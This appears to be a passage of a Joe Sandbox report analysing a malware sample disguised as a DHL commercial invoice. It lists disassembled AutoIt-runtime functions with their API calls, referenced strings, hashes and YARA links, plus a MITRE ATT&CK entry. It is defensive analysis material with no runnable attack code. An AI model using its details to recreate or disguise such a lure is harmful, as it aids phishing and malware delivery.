Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: fa237b25923d0265f40b8663ab38f2609312e88f27b505557785ea2994667bfe
Instruction ID: 13b23a05629a1c422e1ebffbf61b2ca35784a7eaad30f15237478ec74bdf463b
Opcode Fuzzy Hash: fa237b25923d0265f40b8663ab38f2609312e88f27b505557785ea2994667bfe
Instruction Fuzzy Hash: 2231A171100204AADB20DF68DC80EFB77A9FF49724F00862EF855D7280DA39AD81C768

Function 00494537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0049461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00494634

Strings

', xrefs: 0049458E

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f9aac446b699ccde0d962463543365e2f8ff15e65cc60a94f0a32b8828f95919
Instruction ID: b670a6df3bfb36399edf79c3a21aa4b452bd0c69e87ca9b6b1efca1536d34c0b
Opcode Fuzzy Hash: f9aac446b699ccde0d962463543365e2f8ff15e65cc60a94f0a32b8828f95919
Instruction Fuzzy Hash: 803137B4A01209AFDF14CFA9C990BDA7BB5FB49310F11407AEA04AB391D734A942CF94

Function 004931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0049327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00493287

Strings

Combobox, xrefs: 00493249

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: b2e6bd7bde28a5fca05dee674e077ab900e0af6054f5d2a78211b50724a9ec20
Instruction ID: 53c26a8419a2af9500000f2e8faa10e46a2095fa3473df88d3b17126a3616a67
Opcode Fuzzy Hash: b2e6bd7bde28a5fca05dee674e077ab900e0af6054f5d2a78211b50724a9ec20
Instruction Fuzzy Hash: 1A11E2713002087FFF21DF94DC80EBB3B6AEB953A9F10013AF918A7290D6399D518764

Function 00493710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0040600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040604C
Part of subcall function 0040600E: GetStockObject.GDI32(00000011), ref: 00406060
Part of subcall function 0040600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0040606A

GetWindowRect.USER32(00000000,?), ref: 0049377A
GetSysColor.USER32(00000012), ref: 00493794

Strings

static, xrefs: 00493757

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: abd42e7da819cb3714455c727f5ce1a7d6fb2b90bfbab7ca4dd80a61a0709472
Instruction ID: b11262674f5e18e9993189c4d7777c52fd53b031a25f2c3957537cd78a81b65d
Opcode Fuzzy Hash: abd42e7da819cb3714455c727f5ce1a7d6fb2b90bfbab7ca4dd80a61a0709472
Instruction Fuzzy Hash: F0113AB2610209AFDF00DFA8CC46EEA7BB8FB09315F01496AFD55E2250D739E8619B54

Function 0047CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0047CDA6

Strings

<local>, xrefs: 0047CD66

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d89e58862155fc217246a4b1e07bb642df3261dbfdeb7b68bd711acd35ac8a90
Instruction ID: 8339a9b9194697649c21a59ed4a72e8ab03c1194750d865b6d1bcbb7212598fa
Opcode Fuzzy Hash: d89e58862155fc217246a4b1e07bb642df3261dbfdeb7b68bd711acd35ac8a90
Instruction Fuzzy Hash: 6B11A371245632BAD7344A668CC5FE7BEACEB527A4F00823FB10D92180D6689841D6F4

Function 00493429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004934AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004934BA

Strings

edit, xrefs: 0049348F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 665bea3e8908f2a30d1b24ab1824d2e4a124b83566d2ed456025cb0841e0e1cb
Instruction ID: 99ad80856f2139ecd37a81d857a61cbe63f5ec37252cfc98367f74baf7ca364f
Opcode Fuzzy Hash: 665bea3e8908f2a30d1b24ab1824d2e4a124b83566d2ed456025cb0841e0e1cb
Instruction Fuzzy Hash: 4E11BF71100108ABEF118F64DC84AAB3BAAEB16379F514336F961932E0C739EC519B68

Function 00466C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

CharUpperBuffW.USER32(?,?,?), ref: 00466CB6
_wcslen.LIBCMT ref: 00466CC2

Strings

STOP, xrefs: 00466CBC, 00466CC1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: dc70c5d4ee27dc69aa86e32f5615b99e17181f250a9658c833637702a8fd888e
Instruction ID: 2fdac53f4e714fa6a7d542c033d70be5027df1260e0617ae96c54ed08d1e7e48
Opcode Fuzzy Hash: dc70c5d4ee27dc69aa86e32f5615b99e17181f250a9658c833637702a8fd888e
Instruction Fuzzy Hash: 33010432A109268ACB20AFBDDC809BF73A4EE60714702053BE86292291FB39DC40C659

Function 00461BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 00463CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00463CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00461C46

Strings

ListBox, xrefs: 00461C10
ComboBox, xrefs: 00461BE5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cb895c6372d0d6fae9861d0dd1e860a741e0e1362341cb1efa1fda6e7dfd6e9a
Instruction ID: 0597a438504da59e00f8abc4464d5a247d5c7bee5e0e142cd15731590097fbc9
Opcode Fuzzy Hash: cb895c6372d0d6fae9861d0dd1e860a741e0e1362341cb1efa1fda6e7dfd6e9a
Instruction Fuzzy Hash: B601A776A8110466DB14EB91C952EFF77A89B11344F14002FB906772D2FA38AE18D6BB

Function 00461C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Part of subcall function 00463CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00463CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00461CC8

Strings

ListBox, xrefs: 00461C94
ComboBox, xrefs: 00461C69

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c2a5318a73241cc1dc5b1058b879896892afc14fe025959285147d941a2474ba
Instruction ID: a10a4e44750d24e2bdb598702259e0ba1e539dbd7a79f56e067323db74a2a14c
Opcode Fuzzy Hash: c2a5318a73241cc1dc5b1058b879896892afc14fe025959285147d941a2474ba
Instruction Fuzzy Hash: 0D01A7B6A4015466DB04EB91CA01EFF77A89B11344F14002BB801732D2FA389F08D67B

Function 0041A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0041A529

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

Strings

,%M, xrefs: 0041A509
3yE, xrefs: 0041A545, 0041A54D, 0041A552

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%M$3yE
API String ID: 2551934079-2470809835
Opcode ID: b56e633070973a4b0827c1245d19bcaa9b428485a07fc54579d19c4242eef372
Instruction ID: 137d309c537f08a502bcebdcbeb51410c9490a45075ad08a3231cdcb7726ddd3
Opcode Fuzzy Hash: b56e633070973a4b0827c1245d19bcaa9b428485a07fc54579d19c4242eef372
Instruction Fuzzy Hash: 08014731706210A7CA00F769B96BAAE33659B05754F90006FF501272C3DE6C6D81869F

Function 00498172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004D3018,004D305C), ref: 004981BF
CloseHandle.KERNEL32 ref: 004981D1

Strings

\0M, xrefs: 0049818A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0M
API String ID: 3712363035-1305216280
Opcode ID: ad4302e00514b246930092051f5da298722bef87b003d669d467c42e53d20b61
Instruction ID: bf647492967352d073276b5a149b0e9915153a0acee9f49ac13f981fa327f8bf
Opcode Fuzzy Hash: ad4302e00514b246930092051f5da298722bef87b003d669d467c42e53d20b61
Instruction Fuzzy Hash: 41F03AB1641310BAE3216F65AC4AFB73A9CDB05756F004437BE08D51A2D6798E0082BE

Function 0048747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00487493
_wcslen.LIBCMT ref: 004874B9

Strings

3, 3, 16, 1, xrefs: 00487483

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: fa268ca0598650fcfac9f8558f63851eae8667f213d71d306bccb0f27b7f2969
Instruction ID: 3b9cbf0cfa78f0638a43922b0814ada425af960758d9d1aa3e1598ca11300ed7
Opcode Fuzzy Hash: fa268ca0598650fcfac9f8558f63851eae8667f213d71d306bccb0f27b7f2969
Instruction Fuzzy Hash: F7E02B46304230119271327BACD1A7F5689CFC5BA07741C2FF985C2366EADCCDD193A8

Function 00460B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00460B23

Strings

Error allocating memory., xrefs: 00460B1C
AutoIt, xrefs: 00460B17

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 21ea5055e0a6e1223d389dae4784e278c60b93e1c97d0d9558bb0c8107320035
Instruction ID: ec9470fa480f97f4df7d426a9cae74e88c48e8a23ce6c9b125831f8114b73b7b
Opcode Fuzzy Hash: 21ea5055e0a6e1223d389dae4784e278c60b93e1c97d0d9558bb0c8107320035
Instruction Fuzzy Hash: F4E0483124431836D61437957C43FD97E848F05F55F20447FF758555C39BE9649046ED

Function 00420D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0041F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00420D71,?,?,?,0040100A), ref: 0041F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 00420D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 00420D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00420D7F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 065a4c9dbba9de95bf4742d6beed35bc68529f956b744a891e42663b2337a4be
Instruction ID: c5d4853c5c1b1fce94aee53896b707ea2e933c2cfdf6354c90a1adcc212809e9
Opcode Fuzzy Hash: 065a4c9dbba9de95bf4742d6beed35bc68529f956b744a891e42663b2337a4be
Instruction Fuzzy Hash: 7AE092703013118BDB309FB9E4447427BE0AF10744F40897FE886C6652DBB8E4488B99

Function 0041E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0041E3D5

Strings

0%M, xrefs: 0041E3B5
8%M, xrefs: 0041E3CA

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%M$8%M
API String ID: 1385522511-666571738
Opcode ID: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
Instruction ID: 74f85b7c586fbea48275e29b091cfe4ae65d2a14ce13d66fff79cd8f95e1413d
Opcode Fuzzy Hash: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
Instruction Fuzzy Hash: 89E02035501924DBCE04971AB678DCA3351BB143247D002BBEC22C72D19BBC5881855D

Function 0045D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0045D220

Strings

X64, xrefs: 0045D2A8
%.3d, xrefs: 0045D22B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 2db8d864e82e9443b24b989cbfe5594a8cb9d6c2eec2c4614c7c7a76411d85fe
Instruction ID: 38b857cef762aee038f24abea3c29ea6d50e0b75d9b6a8f5b8584eac959ee1e6
Opcode Fuzzy Hash: 2db8d864e82e9443b24b989cbfe5594a8cb9d6c2eec2c4614c7c7a76411d85fe
Instruction Fuzzy Hash: 35D012B5C08108EACBA097D0DC459F9B37CAF18302F6084A7FC0691042D62CD54EEB6B

Function 00492356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0049236C
PostMessageW.USER32(00000000), ref: 00492373

Part of subcall function 0046E97B: Sleep.KERNEL32 ref: 0046E9F3

Strings

Shell_TrayWnd, xrefs: 00492365

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9e1d063b7c62fc5eb741fb1641bc1c1ccf46c772bc3719f8f1f448acc4471665
Instruction ID: 4fbe58dc7f34bcc61f3faa01408e30d6f80e66574df614ba2c414afb8f37d73a
Opcode Fuzzy Hash: 9e1d063b7c62fc5eb741fb1641bc1c1ccf46c772bc3719f8f1f448acc4471665
Instruction Fuzzy Hash: 92D0A936381310BAE6A4A3319C4FFC666249B10B10F01493B7201AA0D0C8A4A8008A0C

Function 00492322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0049232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0049233F

Part of subcall function 0046E97B: Sleep.KERNEL32 ref: 0046E9F3

Strings

Shell_TrayWnd, xrefs: 00492325

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e079d67999e0d67ae200226728b429cca74cceb1a253ffad2ffcc98b29bed123
Instruction ID: 612e0c117d57113be67f559a3391629b3461a494fcf43874db1c798f2140144d
Opcode Fuzzy Hash: e079d67999e0d67ae200226728b429cca74cceb1a253ffad2ffcc98b29bed123
Instruction Fuzzy Hash: 53D0223A380310B7E6A4B331DC4FFC67A249F10B10F01493B7305AA0D0C8F4A800CA0C

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

